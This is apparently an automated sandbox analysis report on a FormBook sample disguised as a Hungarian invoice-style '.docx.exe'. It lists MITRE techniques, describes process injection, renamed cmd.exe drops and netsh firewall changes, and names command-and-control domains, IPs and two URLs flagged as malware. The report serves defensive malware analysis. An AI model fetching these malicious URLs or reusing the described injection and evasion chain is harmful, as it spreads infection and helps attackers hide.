          Source: Yara matchFile source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		1
          Valid Accounts          		1
          Valid Accounts          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          System Network Connections Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Access Token Manipulation          		3
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook812
          Process Injection          		1
          Timestomp          		NTDS234
          System Information Discovery          		Distributed Component Object ModelInput Capture112
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets341
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Rootkit          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
          Masquerading          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Valid Accounts          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Access Token Manipulation          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd812
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553904 Sample: #U00c1raj#U00e1nlat k#U00e9... Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 41 www.apaescortatings.xyz 2->41 43 www.9838.xyz 2->43 45 11 other IPs or domains 2->45 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 59 11 other signatures 2->59 11 #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe 4 2->11         started        signatures3 57 Performs DNS queries to domains with low reputation 43->57 process4 dnsIp5 47 mbsngradnja.com 77.105.36.123, 49732, 49733, 80 ORIONTELEKOM-ASRS Serbia 11->47 49 voievodulgelu.ro 92.114.2.230, 49730, 49731, 80 DIALTELECOMRO Romania 11->49 69 Writes to foreign memory regions 11->69 71 Allocates memory in foreign processes 11->71 73 Creates a thread in another existing process (thread injection) 11->73 75 Injects a PE file into a foreign processes 11->75 15 SndVol.exe 11->15         started        18 cmd.exe 1 11->18         started        signatures6 process7 signatures8 85 Modifies the context of a thread in another process (thread injection) 15->85 87 Maps a DLL or memory area into another process 15->87 89 Sample uses process hollowing technique 15->89 91 3 other signatures 15->91 20 explorer.exe 70 1 15->20 injected 23 esentutl.exe 2 18->23         started        26 esentutl.exe 2 18->26         started        28 conhost.exe 18->28         started        process9 file10 61 Uses netsh to modify the Windows network and firewall settings 20->61 30 netsh.exe 20->30         started        37 C:\Users\Public\alpha.pif, PE32 23->37 dropped 63 Drops PE files to the user root directory 23->63 65 Drops PE files with a suspicious file extension 23->65 67 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 23->67 39 C:\Users\Public\xpha.pif, PE32 26->39 dropped signatures11 process12 signatures13 77 Modifies the context of a thread in another process (thread injection) 30->77 79 Maps a DLL or memory area into another process 30->79 81 Tries to detect virtualization through RDTSC time measurements 30->81 83 Switches to a custom stack to bypass stack traces 30->83 33 cmd.exe 1 30->33         started        process14 process15 35 conhost.exe 33->35         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe47%ReversingLabsWin32.Backdoor.FormBook
          #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe100%AviraHEUR/AGEN.1326052
          #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\alpha.pif0%ReversingLabs
          C:\Users\Public\xpha.pif0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.ental-implants-50062.bondReferer:0%Avira URL Cloudsafe
          http://www.r-outsourcing-69869.bond/d05n/www.apaescortatings.xyz0%Avira URL Cloudsafe
          http://www.upta.bio0%Avira URL Cloudsafe
          http://www.ursing-caregiver-jobs-za-3.bond/d05n/0%Avira URL Cloudsafe
          http://www.trl-migrate.online/d05n/0%Avira URL Cloudsafe
          http://www.trl-migrate.online0%Avira URL Cloudsafe
          http://voievodulgelu.ro/244_Rgzwnbqrkpnl0%Avira URL Cloudsafe
          http://www.xc31.top/d05n/0%Avira URL Cloudsafe
          http://www.egakids.shopReferer:0%Avira URL Cloudsafe
          http://www.atingdilse.site/d05n/www.joops.music0%Avira URL Cloudsafe
          http://www.trl-migrate.onlineReferer:0%Avira URL Cloudsafe
          http://www.xc31.top/d05n/www.ursing-caregiver-jobs-za-3.bond0%Avira URL Cloudsafe
          http://www.apaescortatings.xyz/d05n/0%Avira URL Cloudsafe
          http://www.ybzert.online0%Avira URL Cloudsafe
          http://mbsngradnja.com/244_Rgzwnbqrkpnv0%Avira URL Cloudsafe
          http://www.joops.music0%Avira URL Cloudsafe
          www.atingdilse.site/d05n/0%Avira URL Cloudsafe
          http://www.trl-migrate.online/d05n/www.r-outsourcing-69869.bond0%Avira URL Cloudsafe
          http://www.ynapticshiftai.tech/d05n/0%Avira URL Cloudsafe
          http://voievodulgelu.ro/244_Rgzwnbqrkpn100%Avira URL Cloudmalware
          http://mbsngradnja.com:80/244_Rgzwnbqrkpn100%Avira URL Cloudmalware
          http://www.9838.xyz0%Avira URL Cloudsafe
          http://www.egakids.shop/d05n/www.ental-implants-50062.bond0%Avira URL Cloudsafe
          http://www.egakids.shop0%Avira URL Cloudsafe
          http://www.ursing-caregiver-jobs-za-3.bond/d05n/www.trl-migrate.online0%Avira URL Cloudsafe
          http://www.eanliving.site/d05n/0%Avira URL Cloudsafe
          http://www.ynapticshiftai.techReferer:0%Avira URL Cloudsafe
          http://www.9838.xyz/d05n/0%Avira URL Cloudsafe
          http://www.ursing-caregiver-jobs-za-3.bond0%Avira URL Cloudsafe
          http://mbsngradnja.com/244_Rgzwnbqrkpnb:$0%Avira URL Cloudsafe
          http://mbsngradnja.com/244_Rgzwnbqrkpn4W0%Avira URL Cloudsafe
          http://www.atingdilse.siteReferer:0%Avira URL Cloudsafe
          http://www.ynthia-mcc-lin-tick.linkReferer:0%Avira URL Cloudsafe
          http://www.ybzert.onlineReferer:0%Avira URL Cloudsafe
          http://www.ynthia-mcc-lin-tick.link/d05n/www.atingdilse.site0%Avira URL Cloudsafe
          http://www.egos.design/d05n/0%Avira URL Cloudsafe
          http://www.egakids.shop/d05n/0%Avira URL Cloudsafe
          http://www.atingdilse.site/d05n/0%Avira URL Cloudsafe
          http://www.joops.music/d05n/www.upta.bio0%Avira URL Cloudsafe
          http://www.9838.xyz/d05n/www.ybzert.online0%Avira URL Cloudsafe
          http://www.eanliving.siteReferer:0%Avira URL Cloudsafe
          http://mbsngradnja.com/244_Rgzwnbqrkpn100%Avira URL Cloudmalware
          http://www.apaescortatings.xyzReferer:0%Avira URL Cloudsafe
          http://www.egos.design0%Avira URL Cloudsafe
          http://www.xc31.top0%Avira URL Cloudsafe
          http://www.ynthia-mcc-lin-tick.link/d05n/0%Avira URL Cloudsafe
          http://www.upta.bio/d05n/0%Avira URL Cloudsafe
          http://www.ynapticshiftai.tech0%Avira URL Cloudsafe
          http://www.ybzert.online/d05n/www.ynapticshiftai.tech0%Avira URL Cloudsafe
          http://www.apaescortatings.xyz/d05n/www.ynthia-mcc-lin-tick.link0%Avira URL Cloudsafe
          http://www.apaescortatings.xyz0%Avira URL Cloudsafe
          http://www.atingdilse.site0%Avira URL Cloudsafe
          http://www.ynapticshiftai.tech/d05n/www.eanliving.site0%Avira URL Cloudsafe
          http://mbsngradnja.com/244_RgzwnbqrkpnZ0%Avira URL Cloudsafe
          http://www.egos.design/d05n/www.xc31.top0%Avira URL Cloudsafe
          http://www.eanliving.site0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mbsngradnja.com
          		77.105.36.123
          		truetrue
            		unknown
            voievodulgelu.ro
            		92.114.2.230
            		truetrue
              		unknown
              www.egos.design
              		unknown
              		unknowntrue
                		unknown
                www.9838.xyz
                		unknown
                		unknowntrue
                  		unknown
                  www.trl-migrate.online
                  		unknown
                  		unknowntrue
                    		unknown
                    www.apaescortatings.xyz
                    		unknown
                    		unknowntrue
                      		unknown
                      www.joops.music
                      		unknown
                      		unknowntrue
                        		unknown
                        www.upta.bio
                        		unknown
                        		unknowntrue
                          		unknown
                          www.r-outsourcing-69869.bond
                          		unknown
                          		unknowntrue
                            		unknown
                            www.atingdilse.site
                            		unknown
                            		unknowntrue
                              		unknown
                              www.ursing-caregiver-jobs-za-3.bond
                              		unknown
                              		unknowntrue
                                		unknown
                                www.ynthia-mcc-lin-tick.link
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.xc31.top
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    www.atingdilse.site/d05n/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://voievodulgelu.ro/244_Rgzwnbqrkpntrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://mbsngradnja.com/244_Rgzwnbqrkpntrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://aka.ms/odirmrexplorer.exe, 00000006.00000003.3492560819.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106881820.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.atingdilse.site/d05n/www.joops.musicexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.upta.bioexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.xc31.top/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ental-implants-50062.bondReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0##U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://excel.office.comexplorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://voievodulgelu.ro/244_Rgzwnbqrkpnl#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000056B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.r-outsourcing-69869.bond/d05n/www.apaescortatings.xyzexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.trl-migrate.online/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ursing-caregiver-jobs-za-3.bond/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000006.00000000.1808128757.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4178769883.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.egakids.shopReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://wns.windows.com/Lexplorer.exe, 00000006.00000002.4178769883.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.trl-migrate.onlineexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://word.office.comexplorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.ybzert.onlineexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.apaescortatings.xyz/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.trl-migrate.onlineReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.xc31.top/d05n/www.ursing-caregiver-jobs-za-3.bondexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.joops.musicexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://mbsngradnja.com/244_Rgzwnbqrkpnv#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.trl-migrate.online/d05n/www.r-outsourcing-69869.bondexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
